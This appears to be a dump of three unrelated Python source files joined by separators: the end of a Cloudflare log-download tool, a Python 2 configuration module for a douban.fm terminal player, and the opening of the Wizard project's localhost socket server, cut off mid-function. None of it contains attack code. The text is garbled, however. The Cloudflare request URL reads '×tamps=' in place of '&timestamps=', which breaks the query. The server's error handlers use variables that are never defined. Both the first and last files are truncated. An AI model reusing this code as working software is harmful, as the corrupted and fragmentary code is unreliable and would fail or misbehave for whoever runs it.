url = "https://api.cloudflare.com/client/v4/zones/" + zone_id + "/logs/received"
headers = {"Authorization": "Bearer " + api_token, "Content-Type": "application/json"}
#make a HTTP request to the Cloudflare API
try:
r = requests.get(url, headers=headers)
r.encoding = "utf-8"
except Exception as e:
logger.critical(str(datetime.now()) + " --- Unable to perform API request to Cloudflare: " + str(e))
sys.exit(2)
#if there's an error, Cloudflare API will return a JSON object to indicate the error
#and if it's not, a plain text will be returned instead
#the try except block is to catch any errors raised by json.loads(), in case Cloudflare is not returning JSON object
try:
response = json.loads(r.text)
if response["success"] is False:
logger.critical(str(datetime.now()) + " --- Failed to authenticate with Cloudflare API. Please check your Zone ID and Cloudflare API Token.")
sys.exit(2)
except json.JSONDecodeError:
#a non-JSON object returned by Cloudflare indicates that authentication successful
pass
elif log_type == 'access':
#specify the Cloudflare API URL to check the Account ID and API Token
url = "https://api.cloudflare.com/client/v4/accounts/" + account_id + "/access/logs/access_requests"
headers = {"Authorization": "Bearer " + api_token, "Content-Type": "application/json"}
#make a HTTP request to the Cloudflare API
try:
r = requests.get(url, headers=headers)
r.encoding = "utf-8"
except Exception as e:
logger.critical(str(datetime.now()) + " --- Unable to perform API request to Cloudflare: " + str(e))
sys.exit(2)
#Cloudflare API should always return a JSON object to indicate whether the request is successful or not.
#the try except block is to catch any errors raised by json.loads(), in case Cloudflare is not returning JSON object
try:
response = json.loads(r.text)
if response["success"] is False:
logger.critical(str(datetime.now()) + " --- Failed to authenticate with Cloudflare API. Please check your Account ID and Cloudflare API Token.")
sys.exit(2)
else:
#no errors. Can proceed with logpull.
pass
except json.JSONDecodeError as e:
logger.critical(str(datetime.now()) + " --- Unable to perform API request to Cloudflare: " + str(e))
'''
This method is to initialize the folder with the date and time of the logs being stored on local storage as the name of the folder
If the folder does not exist, it will automatically create a new one
'''
def initialize_folder(path_with_date):
data_folder = Path(path_with_date)
data_folder.mkdir(parents=True, exist_ok=True)
return data_folder
'''
This method is to prepare the path of where the logfile will be stored and what will be the name of the logfile.
If the logfile already exists, we assume that the logs has been pulled from Cloudflare previously
'''
def prepare_path(log_start_time_rfc3339, log_end_time_rfc3339, data_folder, logfile_name_prefix, no_gzip):
logfile_name = logfile_name_prefix + "_" + log_start_time_rfc3339 + "~" + log_end_time_rfc3339 + (".json" if no_gzip is True else ".json.gz")
logfile_path = data_folder / logfile_name
if os.path.exists(str(logfile_path)):
return logfile_path, False
else:
return logfile_path, True
'''
A method to check whether the user initiates program exit.
This method will be triggered every time the logpull thread finishes its job (which is, finish the logpull)
This method will minus 1 from the total number of running threads, and check whether the user triggers the program exit process.
If program exit initiated by user, is_exit will become True, and this method will make sure that number of running threads must be zero in order to exit the program gracefully.
'''
def check_if_exited():
global is_exit, num_of_running_thread
num_of_running_thread -= 1
if is_exit is True and num_of_running_thread <= 0:
logger.info(str(datetime.now()) + " --- Program exited gracefully.")
sys.exit(0)
return False
'''
This method will be called if the process receives SIGINT or SIGTERM signal from the system.
The purpose is to gracefully terminate the program.
This method will check if the number of running threads is 0 (means no logpull subprocess running), then it will display an info message showing that program exited gracefully.
This method also sets the is_exit flag so that other logpull subprocess can check this flag before they exit.
'''
def graceful_terminate(signum, frame):
global is_exit, num_of_running_thread, event
is_exit = True
#stop all the sleep timers in other methods, particularly queue_thread()
event.set()
print("")
logger.info(str(datetime.now()) + " --- " + signal.Signals(signum).name + " detected. Initiating program exit. Finishing up log download tasks...")
if num_of_running_thread <= 0:
logger.info(str(datetime.now()) + " --- Program exited gracefully.")
sys.exit(0)
'''
This method is responsible to write logs to local storage after the logs have been pulled from Cloudflare API.
Depending on the user preference, logs might need to save in compressed gzip format.
'''
def write_logs(logfile_path, data, no_gzip):
dirname, basename = os.path.split(logfile_path)
try:
if no_gzip is True:
#open the temporary file as write mode if user specifies not to compress the logs. Save the logs from decoded text response.
logfile = tempfile.NamedTemporaryFile(mode="w", encoding="utf-8", prefix=basename, dir=dirname)
if log_type == "http":
#write the decompressed data
logfile.write(str(decompress(data).decode(encoding='utf-8')))
elif log_type == 'access':
#Cloudflare Access log does not compress by default. Can write to file directly.
logfile.write(data)
#after writing logs to temporary file, create a hard link from actual file to the temporary file
os.link(logfile.name, logfile_path)
else:
#open the temporary file as write binary mode to save the logs from raw gzipped response.
logfile = tempfile.NamedTemporaryFile(mode="wb", prefix=basename, dir=dirname)
if log_type == "http":
#write the compressed gzip data
logfile.write(data)
elif log_type == 'access':
#Cloudflare Access log does not compress by default. Data compression needs to be applied first.
logfile.write(compress(data.encode()))
#after writing logs to temporary file, create a hard link from actual file to the temporary file
os.link(logfile.name, logfile_path)
#close the temporary file and it will automatically deleted
logfile.close()
except Exception as e:
return False, e
return True, True
'''
This method will be run as a separate thread
Its main responsibility is to pick up new tasks from the queue and perform the logpull tasks again.
'''
def queue_thread():
global num_of_running_thread, queue, is_exit, event
#ensure that this process is also counted as one running thread, useful to perform task cleanup while stopping the process
num_of_running_thread += 1
#failed count to check how many failed tasks
failed_count = 0
#wait for 5 seconds before starting the process below, doesn't make sense to check the queue immediately after running the tool
event.wait(5)
#keep below process in a loop until it's terminated by the user
while True:
try:
#check whether the queue has any content (size larger than 0)
if queue.size > 0:
#get the item from the queue based on FIFO
item = queue.get()
#then run the logpull task again
logger.info(str(datetime.now()) + " --- Retrying log range " + item.get('log_start_time_utc').isoformat() + "Z to " + item.get('log_end_time_utc').isoformat() + "Z from queue due to " + item.get('reason') + "... (currently " + str(queue.size) + " item(s) left in the queue)")
null, status = logs_thread(item.get('folder_time'), item.get('log_start_time_utc'), item.get('log_end_time_utc'))
#check the status returned from the logpull process, if True means the last logpull task has been successful
if status is True:
failed_count = 0
event.wait(3)
else:
#if not, increment the failed count counter, also check if the failed tasks more than or equal to 3
failed_count += 1
if failed_count >= 3:
#too many failed tasks, wait for 60 seconds and try again
event.wait(60)
else:
#else, just wait for 3 seconds
event.wait(3)
else:
#if no item in the queue, wait for 5 seconds and try again
event.wait(5)
#check if the user wants to stop the logpull process, if no then just continue the looping
if is_exit is True:
time.sleep(1)
return check_if_exited()
else:
pass
except Exception as e:
logger.critical(str(datetime.now()) + " --- Queue thread failed unexpectedly. Exception message: " + str(e))
continue
'''
This method will handle the overall log processing tasks and it will run as a separate thread.
Based on the interval setting configured by the user, this method will only handle logs for a specific time slot.
'''
def logs_thread(current_time, log_start_time_utc, log_end_time_utc):
global num_of_running_thread, logger, retry_attempt, final_fields, log_dest, queue, one_time
#a list to store list of objects - log destination configuration
log_dest_per_thread = []
log_dest_per_thread_final = []
#add one to the variable to indicate number of running threads. useful to determine whether to exit the program gracefully
num_of_running_thread += 1
#specify the number of attempts to retry in the event of error
#Note! Setting 0 prevents retrying logpull tasks as defined in below code. The process will be replaced by queue_thread() instead.
retry_attempt = 0
#a variable to check whether the request to Cloudflare API is successful.
request_success = False
#a variable to check whether we should skip adding failed items to the queue (based on situation)
skip_add_queue = False
status_code = 0
cf_status_code = 0
cf_err_msg = ""
#if the user instructs the program to do logpull for only one time, the logs will not be stored in folder that follows the naming convention: date and time
if one_time is True or (all(d.get('no_organize') is True for d in log_dest)):
pass
else:
#get the current date and hour, these will be used to initialize the folder to store the logs
today_date = str(current_time.date())
current_hour = str(current_time.hour) + "00"
#get the log start time and log end time in RFC3339 format, so Cloudflare API will understand it and pull the appropriate logs for us
log_start_time_rfc3339 = log_start_time_utc.isoformat() + 'Z'
log_end_time_rfc3339 = log_end_time_utc.isoformat() + 'Z'
#iterate through the list of objects - log destination configuration
for d in log_dest:
#check if the user wants to do one-time operation, or instructs not to organize logs into date and time folder
#if yes, leave the path value as it is
if d.get('no_organize') is True or one_time is True:
log_dest_per_thread.append({'name': d.get('name'), 'path': d.get('path'), 'prefix': d.get('prefix'), 'no_gzip': d.get('no_gzip')})
#if not, modify the path to include date and time folder
else:
log_dest_per_thread.append({'name': d.get('name'), 'path': d.get('path') + "/" + today_date + "/" + current_hour, 'prefix': d.get('prefix'), 'no_gzip': d.get('no_gzip')})
#iterate through the list of objects - log destination configuration
for p in log_dest_per_thread:
#create folder
data_folder = initialize_folder(p.get('path'))
#prepare the full path (incl. file name) to store the logs
logfile_path, prepare_status = prepare_path(log_start_time_rfc3339, log_end_time_rfc3339, data_folder, p.get('prefix'), p.get('no_gzip'))
#check the returned value from prepare_path() method. if False, means logfile already exists and no further action required
if prepare_status is False:
logger.warning(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Logfile " + str(logfile_path) + " already exists! Skipping.")
else:
log_dest_per_thread_final.append({'name': p.get('name'), 'path': logfile_path, 'no_gzip': p.get('no_gzip')})
#check if the python list is empty. Empty list means the particular logpull operation can be skipped because the log file already exists in all destinations.
if not log_dest_per_thread_final:
logger.warning(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Logfile exists in all paths. Skipping.")
return check_if_exited(), True
if log_type == "http":
#specify the URL for the Cloudflare API endpoint, with parameters such as Zone ID, the start time and end time of the logs to pull, timestamp format, sample rate and the fields to be included in the logs
url = "https://api.cloudflare.com/client/v4/zones/" + zone_id + "/logs/received?start=" + log_start_time_rfc3339 + "&end=" + log_end_time_rfc3339 + "×tamps="+ timestamp_format +"&sample=" + sample_rate + "&fields=" + final_fields
#specify headers for the content type and API token. Only accept gzip as response.
headers = {"Authorization": "Bearer " + api_token, "Content-Type": "application/json", "Accept-Encoding": "gzip", 'User-Agent': 'cf-logs-downloader (https://github.com/erictung1999/cf-logs-downloader)'}
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Requesting HTTP logs from Cloudflare...")
elif log_type == 'access':
#specify the URL for the Cloudflare API endpoint, with parameters such as Account ID and the start time and end time of the logs to pull
url = "https://api.cloudflare.com/client/v4/accounts/" + account_id + "/access/logs/access_requests?since=" + log_start_time_rfc3339 + "&until=" + log_end_time_rfc3339 + "&limit=1000"
#specify headers for the content type and API token.
headers = {"Authorization": "Bearer " + api_token, "Content-Type": "application/json", 'User-Agent': 'cf-logs-downloader (https://github.com/erictung1999/cf-logs-downloader)'}
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Requesting Cloudflare Access logs from Cloudflare...")
for i in range(retry_attempt+1):
#make a GET request to the Cloudflare API
try:
r = requests.get(url, headers=headers, stream=True if log_type == "http" else False)
r.encoding = 'utf-8'
except Exception as e:
logger.critical(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Unable to perform API request to Cloudflare: " + str(e) + ". " + (("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
time.sleep(3)
continue
#check whether the HTTP response code is 200, if yes then logpull success and exit the loop
status_code = r.status_code
if r.status_code == 200:
request_success = True
break
else:
#if HTTP response code is not 200, means something happened
logger.debug(str(datetime.now()) + " --- Output from Cloudflare API:\n" + r.text) #the raw response will be logged only if the user enables debugging
try:
#load the JSON object to better access the content of it
response = json.loads(r.text)
except:
#something weird happened if the response is not a JSON object, thus print out the error dump
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Unknown error occured while pulling logs with error code " + str(r.status_code) + ". Error dump: " + r.text + ". " + (("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
time.sleep(3)
continue
#to check whether "success" key exists in JSON object, if yes, check whether the value is False, and print out the error message
if "success" in response:
if response["success"] is False:
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Failed to request logs from Cloudflare with error code " + str(response["errors"][0]["code"]) + ": " + response["errors"][0]["message"] + ". " + ("Consider removing BotScore and BotScoreSrc fields if your zone does not have Bot Management enabled." if response["errors"][0]["code"] == 1010 and ('BotScore' in fields or 'BotScoreSrc' in fields) else ("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
cf_status_code = response["errors"][0]["code"]
cf_err_msg = response["errors"][0]["message"]
if response["errors"][0]["code"] == 1010 and ('BotScore' in fields or 'BotScoreSrc' in fields):
skip_add_queue = True
break
time.sleep(3)
continue
else:
#something weird happened if it is not False. If the request has been successfully done, it should not return this kind of error, instead the raw logs should be returned with HTTP response code 200.
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Unknown error occured while pulling logs with error code " + str(r.status_code) + ". Error dump: " + r.text + ". " + (("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
time.sleep(3)
continue
else:
#other type of error may occur, which may not return a JSON object.
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Unknown error occured while pulling logs with error code " + str(r.status_code) + ". Error dump: " + r.text + ". " + (("Retrying " + str(i+1) + " of " + str(retry_attempt) + "...") if i < (retry_attempt) else ""))
time.sleep(3)
continue
#check whether the logpull process from Cloudflare API has been successfully completed, if yes then proceed with next steps
if request_success is False and one_time is False:
#check if there's a need to add failed tasks to queue, if no, just add it to the log
if skip_add_queue is True:
fail_logger.error("Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + " [" + log_type + "] (Logpull error - HTTP " + str(status_code) + (", Cloudflare " + str(cf_status_code) + " - " + cf_err_msg if cf_status_code != 0 else "") + ")")
else:
queue.put({'folder_time': current_time, 'log_start_time_utc': log_start_time_utc, 'log_end_time_utc': log_end_time_utc, 'log_type': log_type, 'reason': 'Logpull error (HTTP ' + str(status_code) + (", Cloudflare " + str(cf_status_code) + " - " + cf_err_msg if cf_status_code != 0 else "") + ')'})
return check_if_exited(), False
i = 0
if log_type == "http":
#get the raw response (gzipped content) and save it into a variable.
gzip_resp = r.raw.read()
elif log_type == 'access':
json_resp = r.json()
if (len(json_resp["result"]) <= 0):
logger.warning(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": No Access logs during this time range. Will not write file to local storage. Skipping...")
succ_logger.info("Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + " [" + log_type + "] (No Access logs to write)")
return check_if_exited(), True
json_string_resp = [json.dumps(record) for record in json_resp["result"]]
#Proceed to save the logs
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Logs requested. Saving logs...")
#iterate through list of objects - log destination configuration
for each_log_dest in log_dest_per_thread_final:
i += 1
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Writing logs " + str(i) + " of " + str(len(log_dest_per_thread_final)) + " (" + each_log_dest.get('name') + ") to " + str(each_log_dest.get('path')) + " ...")
#write logs to the destination as specified by the user, with the option for gzip
if log_type == "http":
result, e = write_logs(each_log_dest.get('path'), gzip_resp, each_log_dest.get('no_gzip'))
elif log_type == "access":
result, e = write_logs(each_log_dest.get('path'), '\n'.join(json_string_resp) + '\n', each_log_dest.get('no_gzip'))
if result is True:
#successful of write logs
logger.info(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Logs " + ("without gzip compression" if each_log_dest.get('no_gzip') is True else "compressed with gzip") + " (" + each_log_dest.get('name') + ") saved as " + str(each_log_dest.get('path')) + ". ")
else:
#unsuccessful of write logs
logger.error(str(datetime.now()) + " --- Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + ": Failed to save logs to local storage (" + each_log_dest.get('name') + "): " + str(e))
#add failed tasks to queue
if one_time is False:
queue.put({'folder_time': current_time, 'log_start_time_utc': log_start_time_utc, 'log_end_time_utc': log_end_time_utc, 'log_type': log_type, 'reason': 'Write log error (' + each_log_dest.get('name') + ')'})
return check_if_exited(), False
#only write success log if the operation is not one-time
if one_time is False:
succ_logger.info("Log range " + log_start_time_rfc3339 + " to " + log_end_time_rfc3339 + " [" + log_type + "] (" + each_log_dest.get('name') + ")")
#invoke this method to check whether the user triggers program exit sequence
return check_if_exited(), True
####################################################################################################
#register signals with a method. the method will be triggered if the user sends a signal to the program (SIGINT and SIGTERM)
signal.signal(signal.SIGINT, graceful_terminate)
signal.signal(signal.SIGTERM, graceful_terminate)
#This is where the real execution of the program begins. First it will initialize the parameters supplied by the user
initialize_arg()
#After the above execution, it will verify the Zone ID and API Token given by the user whether they are valid
verify_credential()
#if both Zone ID and API Token are valid, the logpull tasks will begin.
logger.info(str(datetime.now()) + " --- Cloudflare logs download tasks started. Log type: " + log_type)
#if the user instructs the program to do logpull for only one time, the program will not do the logpull jobs repeatedly
if one_time is True:
threading.Thread(target=logs_thread, args=(None, start_time_static, end_time_static)).start()
else:
#first get the current system time, both local and UTC time.
#the purpose of getting UTC time is to facilitate the calculation of the start and end time to pull the logs from Cloudflare API
#the purpose of getting local time is to generate a directory structure to store logs, separated by the date and time
current_time_utc = datetime.utcnow()
current_time = datetime.now()
#calculate how many seconds to go back from current time to pull the logs.
if log_type == "http":
#mininum 60 seconds difference to accommodate Cloudflare logs delay, and also add at least 60 seconds or more, based on interval
logs_from = 60.0 + (((interval-1) // 60 * 60) + 60)
elif log_type == "access":
#add at least 60 seconds or more, based on interval
logs_from = 0.0 + (((interval-1) // 60 * 60) + 60)
#calculate the start time to pull the logs from Cloudflare API
log_start_time_utc = current_time_utc.replace(second=0, microsecond=0) - timedelta(seconds=logs_from)
current_time = current_time.replace(second=0, microsecond=0) - timedelta(seconds=logs_from)
#this is useful when we need to repeat the execution of a code block after a certain interval, in an accurate way
#below code will explain the usage of this in detail
initial_time = time.time()
#create a new thread to handle failed tasks inside queue
threading.Thread(target=queue_thread).start()
#force the program to run indefinitely, unless the user stops it with Ctrl+C
while True:
#calculate the end time to pull the logs from Cloudflare API, based on the interval value given by the user
if log_type == "http":
log_end_time_utc = log_start_time_utc + timedelta(seconds=interval)
elif log_type == 'access':
#as Cloudflare Access log request API does not automatically exclude 1 second from end time like what Cloudflare Logpull API does,
#we must manually subtract 1 second so that subsequent log requests will not overlap with the time
log_end_time_utc = log_start_time_utc + timedelta(seconds=interval-1)
#create a new thread to handle the logs processing. the target method is logs() and 3 parameters are supplied to this method
threading.Thread(target=logs_thread, args=(current_time, log_start_time_utc, log_end_time_utc)).start()
#assigning start and end time to the next iteration
if log_type == "http":
log_start_time_utc = log_end_time_utc
elif log_type == 'access':
#adding 1 second back to the next iteration of start time, as previously 1 second deduction has been made
log_start_time_utc = log_end_time_utc + timedelta(seconds=1)
current_time = current_time + timedelta(seconds=interval)
time.sleep(interval - ((time.time() - initial_time) % interval))
|
config.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from threading import Thread
import cPickle as pickle
import ConfigParser
import logging
import time
import os
from doubanfm.API.login import request_token
from doubanfm.check import is_latest, update_package, is_mplayer
from doubanfm.exceptions import ConfigError
is_mplayer()
logger = logging.getLogger('doubanfm') # get logger
THEME = ['default', 'larapaste', 'monokai', 'tomorrow']
PATH_CONFIG = os.path.expanduser("~/.doubanfm_config")
PATH_HISTORY = os.path.expanduser('~/.doubanfm_history')
PATH_TOKEN = os.path.expanduser('~/.doubanfm_token')
CONFIG = '''
[key]
UP = k
DOWN = j
TOP = g
BOTTOM = G
OPENURL = w
RATE = r
NEXT = n
BYE = b
QUIT = q
PAUSE = p
LOOP = l
MUTE = m
LRC = o
HELP = h
HIGH = i
'''
KEYS = {
'UP': 'k',
'DOWN': 'j',
'TOP': 'g',
'BOTTOM': 'G',
'OPENURL': 'w',
'RATE': 'r',
'NEXT': 'n',
'BYE': 'b',
'QUIT': 'q',
'PAUSE': 'p',
'LOOP': 'l',
'MUTE': 'm',
'LRC': 'o',
'HELP': 'h',
'HIGH': 'i'
}
class Config(object):
"""
提供默认值
"""
def __init__(self):
self.volume = 50 # 音量
self.channel = 0 # 频道
self.theme_id = 0 # 主题
self.user_name = '' # 用户名
self.netease = False # 是否使用网易320k音乐播放
self.run_times = 0 # 登陆次数
self.last_time = time.time() # 当前登陆时间戳
self.total_time = 0 # 总共登陆时间
self.liked = 0 # 加❤歌曲
self.banned = 0 # 不再播放
self.played = 0 # 累计播放
self.is_latest = True
self.login_data = self.get_login_data()
def output(args):
def _deco(func):
def _func(self):
print '\033[31m♥\033[0m ' + args,
tmp = func(self)
print ' [\033[32m OK \033[0m]'
return tmp
return _func
return _deco
def get_login_data(self):
"""
提供登陆的认证
这里顺带增加了 volume, channel, theme_id , netease, run_times的默认值
"""
if os.path.exists(PATH_TOKEN):
# 使用上次登录保存的token
with open(PATH_TOKEN, 'r') as f:
login_data = pickle.load(f)
if 'cookies' not in login_data:
login_data = request_token()
else:
# 未登陆
login_data = request_token()
self.get_default_set(login_data)
self.get_user_states(login_data)
self.get_is_latest_version(login_data)
Thread(target=self.check_version).start() # 这里每次异步检测, 下次打开时进行提示
return login_data
def check_version(self):
self.is_latest = is_latest('douban.fm')
def get_is_latest_version(self, login_data):
self.is_latest = login_data.get('is_latest', True)
if not self.is_latest:
if_update = raw_input('检测到douban.fm有更新, 是否升级?(Y) ')
if if_update.lower() == 'y':
update_package('douban.fm')
with open(PATH_TOKEN, 'w') as f:
login_data['is_latest'] = True
pickle.dump(login_data, f)
print '请重新打开douban.fm(升级失败可能需要sudo权限, 试试sudo pip install --upgrade douban.fm)'
os._exit(0)
def get_default_set(self, login_data):
"""
记录退出时的播放状态
"""
self.cookies = login_data.get('cookies', '')
self.user_name = login_data.get('user_name', '')
print '\033[31m♥\033[0m Get local token - Username: \033[33m%s\033[0m' %\
login_data['user_name']
self.channel = login_data.get('channel', 0)
print '\033[31m♥\033[0m Get channel [\033[32m OK \033[0m]'
self.volume = login_data.get('volume', 50)
print '\033[31m♥\033[0m Get volume [\033[32m OK \033[0m]'
self.theme_id = login_data.get('theme_id', 0)
print '\033[31m♥\033[0m Get theme [\033[32m OK \033[0m]'
self.netease = login_data.get('netease', False)
self.keys = self.get_keys()
def get_user_states(self, login_data):
"""
统计用户信息
"""
self.run_times = login_data.get('run_times', 0)
self.total_time = login_data.get('total_time', 0)
@output('Get keys')
def get_keys(self):
'''
获取配置并检查是否更改
'''
if not os.path.exists(PATH_CONFIG):
with open(PATH_CONFIG, 'w') as F:
F.write(CONFIG)
else:
config = ConfigParser.ConfigParser()
with open(PATH_CONFIG, 'r') as cfgfile:
config.readfp(cfgfile)
options = config.options('key')
for option in options:
option = option.upper()
if option in KEYS:
KEYS[option] = config.get('key', option)
return KEYS
@property
def history(self):
try:
with open(PATH_HISTORY, 'r') as f:
history = pickle.load(f)
except IOError:
history = []
return history
def save_config(self, volume, channel, theme, netease):
"""
存储历史记录和登陆信息
"""
self.login_data['cookies'] = self.cookies
self.login_data['volume'] = volume
self.login_data['channel'] = channel
self.login_data['theme_id'] = theme
self.login_data['netease'] = netease
self.login_data['run_times'] = self.run_times + 1
self.login_data['last_time'] = self.last_time
self.login_data['total_time'] = self.total_time +\
time.time() - self.last_time
self.login_data['is_latest'] = self.is_latest
with open(PATH_TOKEN, 'w') as f:
pickle.dump(self.login_data, f)
# with open(PATH_HISTORY, 'w') as f:
# pickle.dump(history, f)
db_config = Config()
|
server.py
|
# coding: utf-8
# Author: Leo BRUNEL
# Contact: contact@leobrunel.com
# This file is part of Wizard
# MIT License
# Copyright (c) 2021 Leo brunel
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
ip_address = 'localhost'
port = 50333
# Python modules
import socket
import sys
import threading
import time
import traceback
import json
import logging
from logging.handlers import RotatingFileHandler
import os
import struct
# create logger
logger = logging.getLogger('WIZARD-SERVER')
logger.setLevel(logging.DEBUG)
user_path = os.path.expanduser('~/Documents/wizard_2/')
if not os.path.isdir(user_path):
os.mkdir(user_path)
log_file = os.path.join(user_path, "wizard_server.log")
# create file handler and set level to debug
file_handler = RotatingFileHandler(log_file, mode='a', maxBytes=1000000, backupCount=1000, encoding=None, delay=False)
# create console handler and set level to debug
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to handlers
stream_handler.setFormatter(formatter)
file_handler.setFormatter(formatter)
# add handlers to logger
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
logger.info("Python : " + str(sys.version))
def get_server(DNS):
server = None
server_address = None
try:
server_address = socket.gethostbyname(DNS[0])
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(DNS)
server.listen(100)
except ConnectionRefusedError:
logger.debug(f"Socket connection refused : host={DNS[0]}, port={DNS[1]}")
return None
except socket.timeout:
logger.debug(f"Socket timeout ({str(timeout)}s) : host={DNS[0]}, port={DNS[1]}")
return None
except:
logger.debug(str(traceback.format_exc()))
return None
return server, server_address
def send_signal_with_conn(conn, msg_raw, only_debug = False):
try:
msg = json.dumps(msg_raw).encode('utf8')
msg = struct.pack('>I', len(msg)) + msg
conn.sendall(msg)
return 1
except ConnectionRefusedError:
if only_debug:
logger.debug(f"Socket connection refused : host={DNS[0]}, port={DNS[1]}")
else:
logger.error(f"Socket connection refused : host={DNS[0]}, port={DNS[1]}")
return None
except socket.timeout:
if only_debug:
logger.debug(f"Socket timeout ({str(timeout)}s) : host={DNS[0]}, port={DNS[1]}")
else:
logger.error(f"Socket timeout ({str(timeout)}s) : host={DNS[0]}, port={DNS[1]}")
return None
except:
if only_debug:
logger.debug(str(traceback.format_exc()))
else:
logger.error(str(traceback.format_exc()))
return None
def recvall(sock):
try:
raw_msglen = recvall_with_given_len(sock, 4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
return recvall_with_given_len(sock, msglen)
except ConnectionRefusedError:
logger.debug(f"Socket connection refused : host={DNS[0]}, port={DNS[1]}")
return None
except socket.timeout:
logger.debug(f"Socket timeout ({str(timeout)}s) : host={DNS[0]}, port={DNS[1]}")
return None
except:
logger.debug(str(traceback.format_exc()))
return None
def recvall_with_given_len(sock, n):
try:
data = bytearray()
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data.extend(packet)
return data
except ConnectionRefusedError:
logger.debug(f"Socket connection refused : host={DNS[0]}, port={DNS[1]}")
return None
except socket.timeout:
logger.debug(f"Socket timeout ({str(timeout)}s) : host={DNS[0]}, port={DNS[1]}")
return None
except:
logger.debug(str(traceback.format_exc()))
return None
return data
class server(threading.Thread):
def __init__(self):
super(server, self).__init__()
logger.info("Starting server on : '" + str(ip_address) + "'")
logger.info("Default port : '" + str(port) + "'")
self.server, self.server_adress = get_server((ip_address, port))
logger.info("Server started")
self.client_ids = dict()
def run(self):
while True:
try:
conn, addr = self.server.accept()
entry_message = recvall(conn)
self.analyse_signal(entry_message, conn, addr)
except:
logger.error(str(traceback.format_exc()))
continue
def analyse_signal(self, msg_raw, conn, addr):
data = json.loads(msg_raw)
if data['type'] == 'test_conn':
logger.info('test_conn')
elif data['type'] == 'refresh_team':
client_dic = dict()
client_dic['id'] = None
self.broadcast(data, client_dic)
elif data['type'] == 'new_client':
self.add_client(data['user_name'], conn, addr, data['project'])
def add_client(self, user_name, conn, addr, project):
client_dic = dict()
client_dic['user_name'] = user_name
client_dic['conn'] = conn
client_dic['addr'] = addr
client_dic['project'] = project
client_id = str(time.time())
client_dic['id'] = client_id
self.client_ids[client_id]=client_dic
threading.Thread(target=self.clientThread, args=(client_id, user_name, conn, addr, project)).start()
logger.info("New client : {}, {}, {}, {}".format(client_id, user_name, addr, project))
signal_dic = dict()
signal_dic['type'] = 'new_user'
signal_dic['user_name'] = user_name
signal_dic['project'] = project
self.broadcast(signal_dic, self.client_ids[client_id])
self.send_users_to_new_client(client_dic)
def send_users_to_new_client(self, client_dic):
for client in self.client_ids.keys():
if client != client_dic['id']:
signal_dic = dict()
signal_dic['type'] = 'new_user'
signal_dic['user_name'] = self.client_ids[client]['user_name']
signal_dic['project'] = self.client_ids[client]['project']
send_signal_with_conn(client_dic['conn'], signal_dic)
def clientThread(self, client_id, user_name, conn, addr, project):
client_dic = dict()
client_dic['id'] = client_id
client_dic['user_name'] = user_name
client_dic['conn'] = conn
client_dic['addr'] = addr
client_dic['project'] = project
running = True
while running:
try:
raw_data = recvall(client_dic['conn'])
if raw_data is not None:
data = json.loads(raw_data)
self.broadcast(data, client_dic)
else:
if conn is not None:
self.remove_client(client_dic)
running = False
except:
logger.error(str(traceback.format_exc()))
continue
def broadcast(self, data, client_dic):
logger.debug("Broadcasting : " + str(data))
for client in self.client_ids.keys():
if client != client_dic['id']:
if not send_signal_with_conn(self.client_ids[client]['conn'], data):
self.remove_client(self.client_ids[client])
def remove_client(self, client_dic):
